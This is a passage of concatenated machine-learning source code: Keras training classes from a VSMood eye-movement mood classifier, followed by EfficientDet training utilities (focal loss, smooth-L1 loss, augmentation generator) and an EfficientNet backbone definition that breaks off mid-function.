X_predicts[self.y_train[:, 1]==0], facecolor='red', alpha=0.5)
log_like = [get_log_likelihood(a, n_bd, bins_bd,
n_d, bins_d) for a in preds]
return np.mean(log_like)
def get_similar(self, preds):
sequences = self.x_test["seq"]
n = sequences.shape[0]
distances = np.zeros(shape=(n, n))
for i in range(n):
for j in range(n):
if i != j:
sequence1 = sequences[i, :]
sequence2 = sequences[j, :]
leven_dist = self.levenshteinDistance(sequence1, sequence2)
distances[i, j] = leven_dist
mean_distances = np.mean(distances, axis=1)
max_distance_index = np.argmax(mean_distances)
preds_max_removed = np.delete(preds, max_distance_index)
return np.mean(preds_max_removed)
def levenshteinDistance(self, s1, s2):
if len(s1) > len(s2):
s1, s2 = s2, s1
distances = range(len(s1) + 1)
for i2, c2 in enumerate(s2):
distances_ = [i2+1]
for i1, c1 in enumerate(s1):
if c1 == c2:
distances_.append(distances[i1])
else:
distances_.append(
1 + min((distances[i1], distances[i1 + 1], distances_[-1])))
distances = distances_
return distances[-1]
def get_log_prob(self, preds):
log_preds = np.log(preds)
log_preds = np.clip(log_preds, -1e15, 1e15)
return np.mean(log_preds)
```
#### File: VSMood/vsbrnn/training.py
```python
import numpy as np
np.random.seed(616)
from keras.models import Sequential
from keras.models import Model
from keras.layers.core import Dense, Activation
from keras.layers import LSTM, GRU
from keras.layers import Embedding
from keras.layers import Conv2D, MaxPooling2D, Dropout, Flatten, MaxoutDense
from keras.layers import Input, concatenate, TimeDistributed
from keras.callbacks import EarlyStopping, History, Callback, ModelCheckpoint
from keras.optimizers import Adam
#from vis.visualization import visualize_activation, visualize_saliency, visualize_cam
from scipy.misc import imsave
from sklearn.metrics import roc_auc_score
import logging
import matplotlib.pyplot as plt
class Auc_callback(Callback):
def __init__(self, validation_data=(), interval=10, verbose=False):
super(Callback, self).__init__()
self.interval = interval
self.verbose = verbose
self.X_val, self.y_val = validation_data
def on_epoch_end(self, epoch, logs={}):
if epoch % self.interval == 0:
y_pred = self.model.predict(self.X_val, verbose=0)[:, 1]
score = roc_auc_score(self.y_val[:, 1], y_pred)
if self.verbose:
print("AUC - epoch: {:d} - score: {:.6f}".format(epoch, score))
class RnnTrain:
def __init__(self, states, **kwargs):
self.states = states
self.batch_size = 40
self.learning_rate = 0.001
self.metrics = ['accuracy']
self.properties = kwargs
self.net = None
def _init_single_modal_net(self, **kwargs):
sequence_size = kwargs["seq"]["shape"]
max_features = kwargs["seq"]["max"]
sequence_input = Input(shape=sequence_size, name="sequence_input")
sequence_dense = Embedding(max_features, self.states)(sequence_input)
encoder = LSTM(self.states, dropout=0.5, recurrent_dropout=0.0)(sequence_dense)
output = Dense(2, activation="softmax", name="classification")(encoder)
model = Model(inputs=sequence_input, outputs=output)
adam = Adam(lr=0.01)
model.compile(loss='categorical_crossentropy', optimizer=adam,
metrics=self.metrics)
return model
def _init_modal_net(self, **kwargs):
sequence_size = kwargs["seq"]["shape"]
max_features = kwargs["seq"]["max"]
sequence_input = Input(shape=sequence_size, name="sequence_input")
sequence_dense = Embedding(max_features, self.states)(sequence_input)
feature_inputs = []
feature_outputs = []
if "use_vsb" in kwargs:
shape = kwargs["use_vsb"]["shape"]
feature_input = Input(shape=shape, name="use_vsb")
feature_dense = Dense(self.states)(feature_input)
feature_inputs.append(feature_input)
feature_outputs.append(feature_dense)
if "use_img_type" in kwargs:
shape = kwargs["use_img_type"]["shape"]
max_features = kwargs["use_img_type"]["max"]
feature_input = Input(shape=shape, name="use_img_type")
feature_dense = Embedding(max_features, self.states)(feature_input)
feature_inputs.append(feature_input)
feature_outputs.append(feature_dense)
if "use_img_pos" in kwargs:
shape = kwargs["use_img_pos"]["shape"]
max_features = kwargs["use_img_pos"]["max"]
feature_input = Input(shape=shape, name="use_img_pos")
feature_dense = Embedding(max_features, self.states)(feature_input)
feature_inputs.append(feature_input)
feature_outputs.append(feature_dense)
merge_layer = concatenate([sequence_dense] + feature_outputs)
encoder = LSTM(self.states + len(feature_outputs) * self.states,
dropout=0.7, recurrent_dropout=0.7)(merge_layer)
# dropout d and recurrent_dropout rd: d=rd=0.7 for the psychiatry paper, d=0.5, rd=0 for the technical paper
output = Dense(2, activation="softmax", name="classification")(encoder)
model = Model(inputs=[sequence_input] + feature_inputs, outputs=[output])
adam = Adam(lr=self.learning_rate)
model.compile(loss='categorical_crossentropy', optimizer=adam,
metrics=self.metrics)
return model
def make_net(self, X):
max_features = np.max(X["seq"]) + 1
sequence_shape = (X["seq"].shape[1],)
net_arguments = {}
net_arguments["seq"] = {"shape": sequence_shape, "max": max_features}
if "use_vsb" in X:
vsb_shape = (X["use_vsb"].shape[1], X["use_vsb"].shape[2])
net_arguments["use_vsb"] = {"shape": vsb_shape}
if "use_img_type" in X:
img_type_shape = (X["use_img_type"].shape[1],)
max_img_type_features = np.max(X["use_img_type"]) + 1
net_arguments["use_img_type"] = {"shape": img_type_shape,
"max": max_img_type_features}
if "use_img_pos" in X:
img_pos_shape = (X["use_img_pos"].shape[1],)
max_img_pos_features = np.max(X["use_img_pos"]) + 1
net_arguments["use_img_pos"] = {"shape": img_pos_shape,
"max": max_img_pos_features}
if "use_vsb" in X or "use_img_type" in X or "use_img_pos" in X:
net = self._init_modal_net(**net_arguments)
else:
net = self._init_single_modal_net(**net_arguments)
return net
def make_X_list(self, *args):
X = args[0] # let X be the first argument,
# assuming that the shape for the data are the same
X_base_list = []
for arg in args:
if X.keys() == ["seq"]:
X_list = arg["seq"]
else:
X_list = [arg["seq"]]
if "use_vsb" in X:
X_list.append(arg["use_vsb"])
if "use_img_type" in X:
X_list.append(arg["use_img_type"])
if "use_img_pos" in X:
X_list.append(arg["use_img_pos"])
X_base_list.append(X_list)
if len(X_base_list) == 1:
return X_base_list[0]
else:
return tuple(X_base_list)
def do_simple_fix_training(self, X_train, y_train, epochs=10):
self.net = self.make_net(X_train)
X_train_list = self.make_X_list(X_train)
his = History()
self.net.fit(X_train_list, y_train, verbose=self.properties['verbose'], shuffle=True,
batch_size=self.batch_size, epochs=epochs,
class_weight="auto",
callbacks=[his])
def do_training(self, X_train, y_train, X_valid, y_valid):
self.net = self.make_net(X_train)
X_train_list, X_valid_list = self.make_X_list(X_train, X_valid)
his = History()
es = EarlyStopping(patience=30, verbose=False, mode='min')
mc = ModelCheckpoint("ModelCheckpoint/tmp.pkg",
save_best_only=True, save_weights_only=True)
self.net.fit(X_train_list, y_train, verbose=self.properties["verbose"],
shuffle=True,
batch_size=self.batch_size, epochs=10000,
validation_data=(X_valid_list, y_valid),
class_weight="auto",
callbacks=[his, es, mc])
self.net.load_weights("ModelCheckpoint/tmp.pkg")
# output_string = ""
# for i in his.history.keys():
# output_string += "{}={} ".format(i, his.history[i][-1])
#return net, output_string
def predict(self, X):
X_list = [X["seq"]]
if "use_vsb" in X:
X_list.append(X["use_vsb"])
if "use_img_type" in X:
X_list.append(X["use_img_type"])
if "use_img_pos" in X:
X_list.append(X["use_img_pos"])
return self.net.predict(X_list, verbose=0)[:, 1]
class RNNFeatureTrain:
def __init__(self, cnn_layer, states, **kwargs):
self.cnn_layer = cnn_layer
self.states = states
self.batch_size = 40
self.learning_rate = 0.001
self.metrics = ['accuracy']
self.properties = kwargs
self.net = None
def make_net(self, X):
input_size = (None, X["seq"].shape[2], X["seq"].shape[3], X["seq"].shape[4])
sequence_input = Input(shape=input_size, name="sequence_input")
convs = Sequential()
if self.cnn_layer in [None, "1", "2"]:
convs.add(Conv2D(10, kernel_size=(3, 3), activation="relu",
input_shape=(
X["seq"].shape[2], X["seq"].shape[3], X["seq"].shape[4])))
convs.add(MaxPooling2D((2, 2), strides=(2, 2)))
if self.cnn_layer in [None, "2"]:
convs.add(Conv2D(20, kernel_size=(3, 3), activation="relu"))
convs.add(MaxPooling2D((2, 2), strides=(2, 2)))
if self.cnn_layer in [None]:
convs.add(Conv2D(40, kernel_size=(3, 3), activation="relu"))
convs.add(MaxPooling2D((2, 2), strides=(2, 2)))
if self.cnn_layer == "none":
convs.add(Flatten(input_shape=(
X["seq"].shape[2], X["seq"].shape[3], X["seq"].shape[4])))
else:
convs.add(Dropout(0.5))
convs.add(Flatten())
        convs.add(MaxoutDense(output_dim=self.states // 2, nb_feature=2, input_dim=self.states))
convs.add(Dropout(0.5))
        convs.add(Dense(self.states // 2, activation="relu", name="features"))
convs.add(Dropout(0.5))
x = TimeDistributed(convs)(sequence_input)
        encoder = LSTM(self.states // 2, dropout=0.5, recurrent_dropout=0.0)(x)
output = Dense(2, activation="softmax", name="classification")(encoder)
model = Model(inputs=sequence_input, outputs=output)
adam = Adam(lr=self.learning_rate)
model.compile(loss='categorical_crossentropy', optimizer=adam,
metrics=self.metrics)
return model
def make_X_list(self, *args):
X_base_list = []
for arg in args:
X_base_list.append(arg['seq'])
if len(X_base_list) == 1:
return X_base_list[0]
else:
return tuple(X_base_list)
def do_training(self, X_train, y_train, X_valid, y_valid):
self.net = self.make_net(X_train)
X_train_list, X_valid_list = self.make_X_list(X_train, X_valid)
his = History()
es = EarlyStopping(patience=30, verbose=False, mode='min')
mc = ModelCheckpoint("ModelCheckpoint/tmp-feat.pkg",
save_best_only=True, save_weights_only=True)
self.net.fit(X_train_list, y_train, verbose=self.properties["verbose"],
shuffle=True,
batch_size=self.batch_size, epochs=10000,
validation_data=(X_valid_list, y_valid),
class_weight="auto",
callbacks=[his, es, mc])
self.net.load_weights("ModelCheckpoint/tmp-feat.pkg")
# output_string = ""
# for i in his.history.keys():
# output_string += "{}={} ".format(i, his.history[i][-1])
#return net, output_string
def predict(self, X):
X_list = [X["seq"]]
return self.net.predict(X_list, verbose=0)[:, 1]
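# --- Hedged usage sketch (comments only; not part of the original file) ---
# RNNFeatureTrain expects X as a dict whose "seq" entry is a 5-D array of shape
# (samples, timesteps, height, width, channels) and y as one-hot labels of shape
# (samples, 2). A typical run might look like this (variable names are placeholders):
#
#   clf = RNNFeatureTrain(cnn_layer=None, states=64, verbose=1)
#   clf.do_training(X_train, y_train, X_valid, y_valid)
#   scores = clf.predict(X_test)   # probability of the positive class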
``` |
{
"source": "JonOnEarth/efficientdet-keras",
"score": 3
} |
#### File: efficientdet-keras/nets/efficientdet_training.py
```python
from keras import backend as K
import keras
import tensorflow as tf
import numpy as np
from random import shuffle
from utils import backend
from PIL import Image
from keras.utils.data_utils import get_file
import cv2
def preprocess_input(image):
image /= 255
mean=(0.406, 0.456, 0.485)
std=(0.225, 0.224, 0.229)
image -= mean
image /= std
return image
def rand(a=0, b=1):
return np.random.rand()*(b-a) + a
def focal(alpha=0.25, gamma=2.0):
def _focal(y_true, y_pred):
# y_true [batch_size, num_anchor, num_classes+1]
# y_pred [batch_size, num_anchor, num_classes]
labels = y_true[:, :, :-1]
        anchor_state = y_true[:, :, -1]  # -1: ignore, 0: background, 1: object present
classification = y_pred
        # Select the anchors assigned to objects
indices_for_object = backend.where(keras.backend.equal(anchor_state, 1))
labels_for_object = backend.gather_nd(labels, indices_for_object)
classification_for_object = backend.gather_nd(classification, indices_for_object)
        # Compute the focal weight for each positive anchor
alpha_factor_for_object = keras.backend.ones_like(labels_for_object) * alpha
alpha_factor_for_object = backend.where(keras.backend.equal(labels_for_object, 1), alpha_factor_for_object, 1 - alpha_factor_for_object)
focal_weight_for_object = backend.where(keras.backend.equal(labels_for_object, 1), 1 - classification_for_object, classification_for_object)
focal_weight_for_object = alpha_factor_for_object * focal_weight_for_object ** gamma
        # Multiply the weights by the binary cross-entropy
cls_loss_for_object = focal_weight_for_object * keras.backend.binary_crossentropy(labels_for_object, classification_for_object)
        # Select the anchors assigned to background
indices_for_back = backend.where(keras.backend.equal(anchor_state, 0))
labels_for_back = backend.gather_nd(labels, indices_for_back)
classification_for_back = backend.gather_nd(classification, indices_for_back)
        # Compute the focal weight for each background anchor
alpha_factor_for_back = keras.backend.ones_like(labels_for_back) * (1 - alpha)
focal_weight_for_back = classification_for_back
focal_weight_for_back = alpha_factor_for_back * focal_weight_for_back ** gamma
        # Multiply the weights by the binary cross-entropy
cls_loss_for_back = focal_weight_for_back * keras.backend.binary_crossentropy(labels_for_back, classification_for_back)
        # Normalizer: the number of positive anchors
normalizer = tf.where(keras.backend.equal(anchor_state, 1))
normalizer = keras.backend.cast(keras.backend.shape(normalizer)[0], keras.backend.floatx())
normalizer = keras.backend.maximum(keras.backend.cast_to_floatx(1.0), normalizer)
        # Divide the summed loss by the number of positive anchors
cls_loss_for_object = keras.backend.sum(cls_loss_for_object)
cls_loss_for_back = keras.backend.sum(cls_loss_for_back)
        # Total loss
loss = (cls_loss_for_object + cls_loss_for_back)/normalizer
return loss
return _focal
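# --- Worked example (comments added for clarity; follows from the defaults above) ---
# With alpha=0.25 and gamma=2.0, a positive anchor is weighted by alpha * (1 - p)**gamma,
# so well-classified examples contribute very little:
#   p = 0.9 -> 0.25 * 0.1**2 = 0.0025
#   p = 0.1 -> 0.25 * 0.9**2 = 0.2025   (81x the weight of the easy example)
# Background anchors are weighted by (1 - alpha) * p**gamma instead, and the summed
# loss is divided by the number of positive anchors.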
def smooth_l1(sigma=3.0):
sigma_squared = sigma ** 2
def _smooth_l1(y_true, y_pred):
regression = y_pred
regression_target = y_true[:, :, :-1]
anchor_state = y_true[:, :, -1]
indices = backend.where(keras.backend.equal(anchor_state, 1))
regression = backend.gather_nd(regression, indices)
regression_target = backend.gather_nd(regression_target, indices)
# compute smooth L1 loss
# f(x) = 0.5 * (sigma * x)^2 if |x| < 1 / sigma / sigma
# |x| - 0.5 / sigma / sigma otherwise
regression_diff = regression - regression_target
regression_diff = keras.backend.abs(regression_diff)
regression_loss = backend.where(
keras.backend.less(regression_diff, 1.0 / sigma_squared),
0.5 * sigma_squared * keras.backend.pow(regression_diff, 2),
regression_diff - 0.5 / sigma_squared
)
# compute the normalizer: the number of positive anchors
normalizer = keras.backend.maximum(1, keras.backend.shape(indices)[0])
normalizer = keras.backend.cast(normalizer, dtype=keras.backend.floatx())
return keras.backend.sum(regression_loss) / normalizer / 4
return _smooth_l1
class Generator(object):
# def __init__(self, bbox_util,batch_size,
# train_lines, val_lines, image_size,num_classes,
# ):
def __init__(self, bbox_util,batch_size,
train_images, train_boxes, val_images, val_boxes, image_size,num_classes,
):
self.bbox_util = bbox_util
self.batch_size = batch_size
# self.train_lines = train_lines
# self.val_lines = val_lines
self.train_images = train_images
self.train_boxes = train_boxes
self.val_images = val_images
self.val_boxes = val_boxes
# self.train_batches = len(train_lines)
self.train_batches = len(train_images)
# self.val_batches = len(val_lines)
self.val_batches = len(val_images)
self.image_size = image_size
self.num_classes = num_classes
# def get_random_data(self, annotation_line, input_shape, jitter=.3, hue=.1, sat=1.5, val=1.5):
def get_random_data(self, image, box, input_shape, jitter=.3, hue=.1, sat=1.5, val=1.5):
        '''Random preprocessing for real-time data augmentation.'''
# line = annotation_line.split()
# image = Image.open(line[0])
image = Image.fromarray(image.astype(np.uint8))
iw, ih = image.size
h, w = input_shape
# box = np.array([np.array(list(map(int,box.split(',')))) for box in line[1:]])
# resize image
new_ar = w/h * rand(1-jitter,1+jitter)/rand(1-jitter,1+jitter)
scale = rand(.25, 2)
if new_ar < 1:
nh = int(scale*h)
nw = int(nh*new_ar)
else:
nw = int(scale*w)
nh = int(nw/new_ar)
image = image.resize((nw,nh), Image.BICUBIC)
# place image
dx = int(rand(0, w-nw))
dy = int(rand(0, h-nh))
new_image = Image.new('RGB', (w,h), (128,128,128))
new_image.paste(image, (dx, dy))
image = new_image
# flip image or not
flip = rand()<.5
if flip: image = image.transpose(Image.FLIP_LEFT_RIGHT)
# distort image
hue = rand(-hue, hue)
sat = rand(1, sat) if rand()<.5 else 1/rand(1, sat)
val = rand(1, val) if rand()<.5 else 1/rand(1, val)
x = cv2.cvtColor(np.array(image,np.float32)/255, cv2.COLOR_RGB2HSV)
x[..., 0] += hue*360
        x[..., 0][x[..., 0]>360] -= 360
        x[..., 0][x[..., 0]<0] += 360
x[..., 1] *= sat
x[..., 2] *= val
x[x[:,:, 0]>360, 0] = 360
x[:, :, 1:][x[:, :, 1:]>1] = 1
x[x<0] = 0
        image_data = cv2.cvtColor(x, cv2.COLOR_HSV2RGB)*255  # numpy array, 0 to 255
# correct boxes
box_data = np.zeros((len(box),5))
if len(box)>0:
np.random.shuffle(box)
box[:, [0,2]] = box[:, [0,2]]*nw/iw + dx
box[:, [1,3]] = box[:, [1,3]]*nh/ih + dy
if flip: box[:, [0,2]] = w - box[:, [2,0]]
box[:, 0:2][box[:, 0:2]<0] = 0
box[:, 2][box[:, 2]>w] = w
box[:, 3][box[:, 3]>h] = h
box_w = box[:, 2] - box[:, 0]
box_h = box[:, 3] - box[:, 1]
box = box[np.logical_and(box_w>1, box_h>1)] # discard invalid box
box_data = np.zeros((len(box),5))
box_data[:len(box)] = box
if len(box) == 0:
return image_data, []
if (box_data[:,:4]>0).any():
return image_data, box_data
else:
return image_data, []
def generate(self, train = True, mosaic = True):
while True:
if train:
                # Shuffle
# shuffle(self.train_lines)
# lines = self.train_lines
N = self.train_images.shape[0]
permut = np.random.permutation(N)
else:
# shuffle(self.val_lines)
# lines = self.val_lines
N = self.val_images.shape[0]
permut = np.random.permutation(N)
inputs = []
target0 = []
target1 = []
# n = len(lines)
# for i in range(len(lines)):
for i in permut:
if train:
img,y = self.get_random_data(self.train_images[i],self.train_boxes[i], self.image_size[0:2])
else:
img,y = self.get_random_data(self.val_images[i],self.val_boxes[i], self.image_size[0:2])
# i = (i+1) % N
if len(y)!=0:
boxes = np.array(y[:,:4],dtype=np.float32)
boxes[:,0] = boxes[:,0]/self.image_size[1]
boxes[:,1] = boxes[:,1]/self.image_size[0]
boxes[:,2] = boxes[:,2]/self.image_size[1]
boxes[:,3] = boxes[:,3]/self.image_size[0]
one_hot_label = np.eye(self.num_classes)[np.array(y[:,4],np.int32)]
y = np.concatenate([boxes,one_hot_label],axis=-1)
                # Compute the anchors matched to the ground-truth boxes and the targets those anchors should predict
assignment = self.bbox_util.assign_boxes(y)
regression = assignment[:,:5]
classification = assignment[:,5:]
inputs.append(preprocess_input(img))
target0.append(np.reshape(regression,[-1,5]))
target1.append(np.reshape(classification,[-1,self.num_classes+1]))
if len(target0) == self.batch_size:
tmp_inp = np.array(inputs)
tmp_targets = [np.array(target0,dtype=np.float32),np.array(target1,dtype=np.float32)]
inputs = []
target0 = []
target1 = []
yield tmp_inp, tmp_targets
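# --- Hedged usage sketch (not part of the original file; names are placeholders) ---
# The generator yields (images, [regression_targets, classification_targets]) batches,
# so it can be passed to fit_generator together with the focal/smooth_l1 losses above,
# assuming the model's two outputs are named "regression" and "classification":
#
#   gen = Generator(bbox_util, batch_size=8,
#                   train_images=train_images, train_boxes=train_boxes,
#                   val_images=val_images, val_boxes=val_boxes,
#                   image_size=(512, 512, 3), num_classes=20)
#   model.compile(optimizer='adam',
#                 loss={'regression': smooth_l1(), 'classification': focal()})
#   model.fit_generator(gen.generate(train=True),
#                       steps_per_epoch=gen.train_batches // 8,
#                       validation_data=gen.generate(train=False),
#                       validation_steps=gen.val_batches // 8)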
```
#### File: efficientdet-keras/nets/efficientnet.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import json
import math
import string
import collections
import numpy as np
from keras import backend
from six.moves import xrange
from nets.layers import BatchNormalization
from keras import layers
BASE_WEIGHTS_PATH = (
'https://github.com/Callidior/keras-applications/'
'releases/download/efficientnet/')
WEIGHTS_HASHES = {
'efficientnet-b0': ('163292582f1c6eaca8e7dc7b51b01c61'
'5b0dbc0039699b4dcd0b975cc21533dc',
'c1421ad80a9fc67c2cc4000f666aa507'
'89ce39eedb4e06d531b0c593890ccff3'),
'efficientnet-b1': ('d0a71ddf51ef7a0ca425bab32b7fa7f1'
'6043ee598ecee73fc674d9560c8f09b0',
'75de265d03ac52fa74f2f510455ba64f'
'9c7c5fd96dc923cd4bfefa3d680c4b68'),
'efficientnet-b2': ('bb5451507a6418a574534aa76a91b106'
'f6b605f3b5dde0b21055694319853086',
'433b60584fafba1ea3de07443b74cfd3'
'2ce004a012020b07ef69e22ba8669333'),
'efficientnet-b3': ('03f1fba367f070bd2545f081cfa7f3e7'
'6f5e1aa3b6f4db700f00552901e75ab9',
'c5d42eb6cfae8567b418ad3845cfd63a'
'a48b87f1bd5df8658a49375a9f3135c7'),
'efficientnet-b4': ('98852de93f74d9833c8640474b2c698d'
'b45ec60690c75b3bacb1845e907bf94f',
'<KEY>'
'd9d91ea64877e8d9c38b6c1e0767c411'),
'efficientnet-b5': ('30172f1d45f9b8a41352d4219bf930ee'
'3339025fd26ab314a817ba8918fefc7d',
'9d197bc2bfe29165c10a2af8c2ebc675'
'07f5d70456f09e584c71b822941b1952'),
'efficientnet-b6': ('f5270466747753485a082092ac9939ca'
'a546eb3f09edca6d6fff842cad938720',
'1d0923bb038f2f8060faaf0a0449db4b'
'96549a881747b7c7678724ac79f427ed'),
'efficientnet-b7': ('876a41319980638fa597acbbf956a82d'
'10819531ff2dcb1a52277f10c7aefa1a',
'60b56ff3a8daccc8d96edfd40b204c11'
'3e51748da657afd58034d54d3cec2bac')
}
BlockArgs = collections.namedtuple('BlockArgs', [
'kernel_size', 'num_repeat', 'input_filters', 'output_filters',
'expand_ratio', 'id_skip', 'strides', 'se_ratio'
])
# defaults will be a public argument for namedtuple in Python 3.7
# https://docs.python.org/3/library/collections.html#collections.namedtuple
BlockArgs.__new__.__defaults__ = (None,) * len(BlockArgs._fields)
DEFAULT_BLOCKS_ARGS = [
BlockArgs(kernel_size=3, num_repeat=1, input_filters=32, output_filters=16,
expand_ratio=1, id_skip=True, strides=[1, 1], se_ratio=0.25),
BlockArgs(kernel_size=3, num_repeat=2, input_filters=16, output_filters=24,
expand_ratio=6, id_skip=True, strides=[2, 2], se_ratio=0.25),
BlockArgs(kernel_size=5, num_repeat=2, input_filters=24, output_filters=40,
expand_ratio=6, id_skip=True, strides=[2, 2], se_ratio=0.25),
BlockArgs(kernel_size=3, num_repeat=3, input_filters=40, output_filters=80,
expand_ratio=6, id_skip=True, strides=[2, 2], se_ratio=0.25),
BlockArgs(kernel_size=5, num_repeat=3, input_filters=80, output_filters=112,
expand_ratio=6, id_skip=True, strides=[1, 1], se_ratio=0.25),
BlockArgs(kernel_size=5, num_repeat=4, input_filters=112, output_filters=192,
expand_ratio=6, id_skip=True, strides=[2, 2], se_ratio=0.25),
BlockArgs(kernel_size=3, num_repeat=1, input_filters=192, output_filters=320,
expand_ratio=6, id_skip=True, strides=[1, 1], se_ratio=0.25)
]
CONV_KERNEL_INITIALIZER = {
'class_name': 'VarianceScaling',
'config': {
'scale': 2.0,
'mode': 'fan_out',
# EfficientNet actually uses an untruncated normal distribution for
# initializing conv layers, but keras.initializers.VarianceScaling use
# a truncated distribution.
# We decided against a custom initializer for better serializability.
'distribution': 'normal'
}
}
DENSE_KERNEL_INITIALIZER = {
'class_name': 'VarianceScaling',
'config': {
'scale': 1. / 3.,
'mode': 'fan_out',
'distribution': 'uniform'
}
}
def get_swish(**kwargs):
def swish(x):
return x * backend.sigmoid(x)
return swish
def get_dropout():
class FixedDropout(layers.Dropout):
def _get_noise_shape(self, inputs):
if self.noise_shape is None:
return self.noise_shape
symbolic_shape = backend.shape(inputs)
noise_shape = [symbolic_shape[axis] if shape is None else shape
for axis, shape in enumerate(self.noise_shape)]
return tuple(noise_shape)
return FixedDropout
def round_filters(filters, width_coefficient, depth_divisor):
filters *= width_coefficient
new_filters = int(filters + depth_divisor / 2) // depth_divisor * depth_divisor
new_filters = max(depth_divisor, new_filters)
if new_filters < 0.9 * filters:
new_filters += depth_divisor
return int(new_filters)
def round_repeats(repeats, depth_coefficient):
return int(math.ceil(depth_coefficient * repeats))
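# --- Worked example (comments added for clarity; values follow from the code above) ---
# round_filters scales a base channel count by the width coefficient and snaps it to a
# multiple of depth_divisor (8), never dropping more than 10% below the scaled value:
#   round_filters(32, 1.1, 8): 32 * 1.1 = 35.2 -> int(35.2 + 4) // 8 * 8 = 32  (kept, since 32 >= 0.9 * 35.2)
#   round_filters(40, 1.1, 8): 40 * 1.1 = 44.0 -> int(44.0 + 4) // 8 * 8 = 48
# round_repeats simply rounds the scaled repeat count up:
#   round_repeats(2, 1.2) = ceil(2.4) = 3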
def mb_conv_block(inputs, block_args, activation, drop_rate=None, prefix='', freeze_bn=False):
has_se = (block_args.se_ratio is not None) and (0 < block_args.se_ratio <= 1)
bn_axis = 3
Dropout = get_dropout()
filters = block_args.input_filters * block_args.expand_ratio
if block_args.expand_ratio != 1:
x = layers.Conv2D(filters, 1,
padding='same',
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=prefix + 'expand_conv')(inputs)
x = layers.BatchNormalization(axis=bn_axis, name=prefix + 'expand_bn')(x)
x = layers.Activation(activation, name=prefix + 'expand_activation')(x)
else:
x = inputs
# Depthwise Convolution
x = layers.DepthwiseConv2D(block_args.kernel_size,
strides=block_args.strides,
padding='same',
use_bias=False,
depthwise_initializer=CONV_KERNEL_INITIALIZER,
name=prefix + 'dwconv')(x)
x = layers.BatchNormalization(axis=bn_axis, name=prefix + 'bn')(x)
x = layers.Activation(activation, name=prefix + 'activation')(x)
# Squeeze and Excitation phase
if has_se:
num_reduced_filters = max(1, int(
block_args.input_filters * block_args.se_ratio
))
se_tensor = layers.GlobalAveragePooling2D(name=prefix + 'se_squeeze')(x)
target_shape = (1, 1, filters) if backend.image_data_format() == 'channels_last' else (filters, 1, 1)
se_tensor = layers.Reshape(target_shape, name=prefix + 'se_reshape')(se_tensor)
se_tensor = layers.Conv2D(num_reduced_filters, 1,
activation=activation,
padding='same',
use_bias=True,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=prefix + 'se_reduce')(se_tensor)
se_tensor = layers.Conv2D(filters, 1,
activation='sigmoid',
padding='same',
use_bias=True,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=prefix + 'se_expand')(se_tensor)
if backend.backend() == 'theano':
# For the Theano backend, we have to explicitly make
# the excitation weights broadcastable.
pattern = ([True, True, True, False] if backend.image_data_format() == 'channels_last'
else [True, False, True, True])
se_tensor = layers.Lambda(
lambda x: backend.pattern_broadcast(x, pattern),
name=prefix + 'se_broadcast')(se_tensor)
x = layers.multiply([x, se_tensor], name=prefix + 'se_excite')
# Output phase
x = layers.Conv2D(block_args.output_filters, 1,
padding='same',
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=prefix + 'project_conv')(x)
# x = BatchNormalization(freeze=freeze_bn, axis=bn_axis, name=prefix + 'project_bn')(x)
x = layers.BatchNormalization(axis=bn_axis, name=prefix + 'project_bn')(x)
if block_args.id_skip and all(
s == 1 for s in block_args.strides
) and block_args.input_filters == block_args.output_filters:
if drop_rate and (drop_rate > 0):
x = Dropout(drop_rate,
noise_shape=(None, 1, 1, 1),
name=prefix + 'drop')(x)
x = layers.add([x, inputs], name=prefix + 'add')
return x
def EfficientNet(width_coefficient,
depth_coefficient,
default_resolution,
dropout_rate=0.2,
drop_connect_rate=0.2,
depth_divisor=8,
blocks_args=DEFAULT_BLOCKS_ARGS,
model_name='efficientnet',
include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
freeze_bn=False,
**kwargs):
features = []
if input_tensor is None:
img_input = layers.Input(shape=input_shape)
else:
img_input = input_tensor
bn_axis = 3
activation = get_swish(**kwargs)
# Build stem
x = img_input
x = layers.Conv2D(round_filters(32, width_coefficient, depth_divisor), 3,
strides=(2, 2),
padding='same',
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name='stem_conv')(x)
# x = BatchNormalization(freeze=freeze_bn, axis=bn_axis, name='stem_bn')(x)
x = layers.BatchNormalization(axis=bn_axis, name='stem_bn')(x)
x = layers.Activation(activation, name='stem_activation')(x)
# Build blocks
num_blocks_total = sum(block_args.num_repeat for block_args in blocks_args)
block_num = 0
for idx, block_args in enumerate(blocks_args):
assert block_args.num_repeat > 0
# Update block input and output filters based on depth multiplier.
block_args = block_args._replace(
input_filters=round_filters(block_args.input_filters,
width_coefficient, depth_divisor),
output_filters=round_filters(block_args.output_filters,
width_coefficient, depth_divisor),
num_repeat=round_repeats(block_args.num_repeat, depth_coefficient))
# The first block needs to take care of stride and filter size increase.
drop_rate = drop_connect_rate * float(block_num) / num_blocks_total
x = mb_conv_block(x, block_args,
activation=activation,
drop_rate=drop_rate,
prefix='block{}a_'.format(idx + 1),
freeze_bn=freeze_bn
)
block_num += 1
if block_args.num_repeat > 1:
# pylint: disable=protected-access
block_args = block_args._replace(
input_filters=block_args.output_filters, strides=[1, 1])
# pylint: enable=protected-access
for bidx in xrange(block_args.num_repeat - 1):
drop_rate = drop_connect_rate * float(block_num) / num_blocks_total
block_prefix = 'block{}{}_'.format(
idx + 1,
string.ascii_lowercase[bidx + 1]
)
x = mb_conv_block(x, block_args,
activation=activation,
drop_rate=drop_rate,
prefix=block_prefix,
freeze_bn=freeze_bn
)
block_num += 1
if idx < len(blocks_args) - 1 and blocks_args[idx + 1].strides[0] == 2:
features.append(x)
elif idx == len(blocks_args) - 1:
features.append(x)
return features
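# --- Hedged note (comments only; not part of the original file) ---
# As written, this backbone returns a list of feature tensors rather than a compiled
# Model: one feature map is collected before each stride-2 stage plus the final stage,
# giving five feature levels for the EfficientDet BiFPN to consume. A caller might use
# it like this (placeholder names):
#
#   inputs = layers.Input(shape=(512, 512, 3))
#   c1, c2, c3, c4, c5 = EfficientNetB0(input_tensor=inputs)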
def EfficientNetB0(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(1.0, 1.0, 224, 0.2,
model_name='efficientnet-b0',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
